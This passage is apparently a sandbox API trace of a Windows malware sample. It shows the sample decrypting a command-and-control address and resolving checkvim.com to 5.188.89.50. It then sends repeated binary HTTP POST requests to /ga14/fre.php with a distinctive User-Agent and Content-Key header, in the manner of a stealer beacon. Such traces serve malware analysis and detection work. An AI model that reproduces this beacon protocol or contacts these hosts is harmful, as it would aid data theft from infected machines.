application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0264.312] GetProcessHeap () returned 0x840000 [0264.312] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0264.312] GetProcessHeap () returned 0x840000 [0264.312] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0264.312] GetProcessHeap () returned 0x840000 [0264.312] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fa28 [0264.312] GetProcessHeap () returned 0x840000 [0264.312] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0264.313] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0264.314] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0264.314] GetProcessHeap () returned 0x840000 [0264.314] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0264.314] GetProcessHeap () returned 0x840000 [0264.314] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0264.314] send (s=0x3d0, buf=0x873a58*, len=237, flags=0) returned 237 [0264.315] send (s=0x3d0, buf=0x87eb58*, len=159, flags=0) returned 159 [0264.315] GetProcessHeap () returned 0x840000 [0264.315] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0264.315] recv (in: s=0x3d0, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0264.674] GetProcessHeap () returned 0x840000 [0264.674] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0264.674] GetProcessHeap () returned 0x840000 [0264.674] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fa28 | out: hHeap=0x840000) returned 1 [0264.674] GetProcessHeap () returned 0x840000 [0264.674] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0264.674] GetProcessHeap () returned 0x840000 [0264.674] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86ff90 | out: hHeap=0x840000) returned 1 [0264.674] closesocket (s=0x3d0) returned 0 [0264.675] GetProcessHeap () returned 0x840000 [0264.675] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b28 | out: hHeap=0x840000) returned 1 [0264.675] GetProcessHeap () returned 0x840000 [0264.675] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0264.675] GetProcessHeap () returned 0x840000 [0264.675] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd88 | out: hHeap=0x840000) returned 1 [0264.675] GetProcessHeap () returned 0x840000 [0264.675] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8711a0 | out: hHeap=0x840000) returned 1 [0264.675] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x3b8) returned 0x3d0 [0264.677] Sleep (dwMilliseconds=0xea60) [0264.703] GetProcessHeap () returned 0x840000 [0264.703] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0264.704] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.705] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0264.836] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.838] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f820) returned 1 [0264.846] GetProcessHeap () returned 0x840000 [0264.846] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0264.847] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.848] CryptImportKey (in: hProv=0x86f820, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e9b0) returned 1 [0264.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.857] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0264.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.859] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0264.859] GetProcessHeap () returned 0x840000 [0264.859] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0264.860] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.860] CryptDecrypt (in: hKey=0x87e9b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fea8, pdwDataLen=0x19f9a4 | out: pbData=0x87fea8, pdwDataLen=0x19f9a4) returned 1 [0264.861] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.862] CryptDestroyKey (hKey=0x87e9b0) returned 1 [0264.862] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.863] CryptReleaseContext (hProv=0x86f820, dwFlags=0x0) returned 1 [0264.863] GetProcessHeap () returned 0x840000 [0264.863] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0264.863] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0264.864] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0264.865] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0264.865] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0264.866] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0264.866] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0264.867] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0264.867] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0264.867] GetProcessHeap () returned 0x840000 [0264.867] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871510 [0264.867] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0264.868] GetProcessHeap () returned 0x840000 [0264.868] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871510 | out: hHeap=0x840000) returned 1 [0264.868] GetProcessHeap () returned 0x840000 [0264.868] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0264.868] GetProcessHeap () returned 0x840000 [0264.868] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0264.868] GetProcessHeap () returned 0x840000 [0264.868] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f908 [0264.871] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.871] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0264.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.877] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fb50) returned 1 [0264.885] GetProcessHeap () returned 0x840000 [0264.885] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0264.886] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.886] CryptImportKey (in: hProv=0x86fb50, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e6f0) returned 1 [0264.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.887] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0264.888] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.888] CryptSetKeyParam (hKey=0x87e6f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0264.888] GetProcessHeap () returned 0x840000 [0264.889] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0264.889] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.890] CryptDecrypt (in: hKey=0x87e6f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f908, pdwDataLen=0x19f9a4 | out: pbData=0x87f908, pdwDataLen=0x19f9a4) returned 1 [0264.890] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.891] CryptDestroyKey (hKey=0x87e6f0) returned 1 [0264.892] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0264.892] CryptReleaseContext (hProv=0x86fb50, dwFlags=0x0) returned 1 [0264.892] GetProcessHeap () returned 0x840000 [0264.892] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0264.893] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0264.893] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0264.894] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0264.894] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0264.895] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0264.895] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0264.895] GetProcessHeap () returned 0x840000 [0264.895] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8711a0 [0264.895] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x8713f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0264.897] GetProcessHeap () returned 0x840000 [0264.897] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871ba8 [0264.897] socket (af=2, type=1, protocol=6) returned 0x3d4 [0264.897] connect (s=0x3d4, name=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0264.971] FreeAddrInfoW (pAddrInfo=0x8713f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c08*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0264.971] GetProcessHeap () returned 0x840000 [0264.971] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f8a8 [0264.971] GetProcessHeap () returned 0x840000 [0264.971] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0264.972] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0264.973] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0264.973] GetProcessHeap () returned 0x840000 [0264.973] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0264.973] GetProcessHeap () returned 0x840000 [0264.973] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0264.973] GetProcessHeap () returned 0x840000 [0264.973] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f950 [0264.973] GetProcessHeap () returned 0x840000 [0264.973] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0264.974] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0264.975] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0264.975] GetProcessHeap () returned 0x840000 [0264.975] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0264.975] GetProcessHeap () returned 0x840000 [0264.975] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0264.975] send (s=0x3d4, buf=0x873a58*, len=237, flags=0) returned 237 [0264.975] send (s=0x3d4, buf=0x87eb58*, len=159, flags=0) returned 159 [0264.975] GetProcessHeap () returned 0x840000 [0264.975] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0264.975] recv (in: s=0x3d4, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0265.342] GetProcessHeap () returned 0x840000 [0265.342] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0265.342] GetProcessHeap () returned 0x840000 [0265.342] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f950 | out: hHeap=0x840000) returned 1 [0265.342] GetProcessHeap () returned 0x840000 [0265.342] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0265.342] GetProcessHeap () returned 0x840000 [0265.343] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f8a8 | out: hHeap=0x840000) returned 1 [0265.343] closesocket (s=0x3d4) returned 0 [0265.343] GetProcessHeap () returned 0x840000 [0265.343] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871ba8 | out: hHeap=0x840000) returned 1 [0265.343] GetProcessHeap () returned 0x840000 [0265.343] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0265.343] GetProcessHeap () returned 0x840000 [0265.343] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f908 | out: hHeap=0x840000) returned 1 [0265.343] GetProcessHeap () returned 0x840000 [0265.343] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8711a0 | out: hHeap=0x840000) returned 1 [0265.344] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x1384) returned 0x3d4 [0265.345] Sleep (dwMilliseconds=0xea60) [0265.347] GetProcessHeap () returned 0x840000 [0265.347] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb00 [0265.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0265.348] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0265.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0265.355] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f8a8) returned 1 [0265.362] GetProcessHeap () returned 0x840000 [0265.362] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0265.363] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0265.363] CryptImportKey (in: hProv=0x86f8a8, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2b0) returned 1 [0265.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0265.364] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0265.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0265.365] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0265.365] GetProcessHeap () returned 0x840000 [0265.365] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0265.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0265.366] CryptDecrypt (in: hKey=0x87e2b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb00, pdwDataLen=0x19f9a4 | out: pbData=0x87fb00, pdwDataLen=0x19f9a4) returned 1 [0265.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0265.367] CryptDestroyKey (hKey=0x87e2b0) returned 1 [0265.368] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0265.368] CryptReleaseContext (hProv=0x86f8a8, dwFlags=0x0) returned 1 [0265.368] GetProcessHeap () returned 0x840000 [0265.368] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0265.369] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0265.369] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0265.370] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0265.370] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0265.371] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0265.372] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0265.372] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0265.372] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0265.373] GetProcessHeap () returned 0x840000 [0265.373] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0265.373] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0265.373] GetProcessHeap () returned 0x840000 [0265.373] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0265.373] GetProcessHeap () returned 0x840000 [0265.373] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0265.373] GetProcessHeap () returned 0x840000 [0265.373] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb00 | out: hHeap=0x840000) returned 1 [0265.373] GetProcessHeap () returned 0x840000 [0265.373] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f680 [0265.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0265.374] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0265.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0265.383] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86ff90) returned 1 [0265.388] GetProcessHeap () returned 0x840000 [0265.388] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870818 [0265.389] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0265.390] CryptImportKey (in: hProv=0x86ff90, pbData=0x870818, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e2b0) returned 1 [0265.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0265.391] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0265.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0265.392] CryptSetKeyParam (hKey=0x87e2b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0265.392] GetProcessHeap () returned 0x840000 [0265.392] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870818 | out: hHeap=0x840000) returned 1 [0265.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0265.393] CryptDecrypt (in: hKey=0x87e2b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f680, pdwDataLen=0x19f9a4 | out: pbData=0x87f680, pdwDataLen=0x19f9a4) returned 1 [0265.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0265.393] CryptDestroyKey (hKey=0x87e2b0) returned 1 [0265.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0265.394] CryptReleaseContext (hProv=0x86ff90, dwFlags=0x0) returned 1 [0265.394] GetProcessHeap () returned 0x840000 [0265.394] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0265.395] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0265.395] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0265.396] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0265.396] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0265.397] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0265.397] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0265.397] GetProcessHeap () returned 0x840000 [0265.397] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8711a0 [0265.397] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871498*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b60*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0265.399] GetProcessHeap () returned 0x840000 [0265.399] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c98 [0265.399] socket (af=2, type=1, protocol=6) returned 0x3d8 [0265.399] connect (s=0x3d8, name=0x878b60*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0265.467] FreeAddrInfoW (pAddrInfo=0x871498*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b60*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0265.467] GetProcessHeap () returned 0x840000 [0265.467] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x870128 [0265.467] GetProcessHeap () returned 0x840000 [0265.468] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8825d8 [0265.468] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0265.469] wvsprintfA (in: param_1=0x8825d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0265.469] GetProcessHeap () returned 0x840000 [0265.469] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0265.469] GetProcessHeap () returned 0x840000 [0265.469] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0265.469] GetProcessHeap () returned 0x840000 [0265.470] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fe18 [0265.470] GetProcessHeap () returned 0x840000 [0265.470] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8825d8 [0265.470] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0265.471] wvsprintfA (in: param_1=0x8825d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0265.471] GetProcessHeap () returned 0x840000 [0265.471] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0265.471] GetProcessHeap () returned 0x840000 [0265.472] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8825d8 | out: hHeap=0x840000) returned 1 [0265.472] send (s=0x3d8, buf=0x873a58*, len=237, flags=0) returned 237 [0265.472] send (s=0x3d8, buf=0x87eb58*, len=159, flags=0) returned 159 [0265.472] GetProcessHeap () returned 0x840000 [0265.472] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 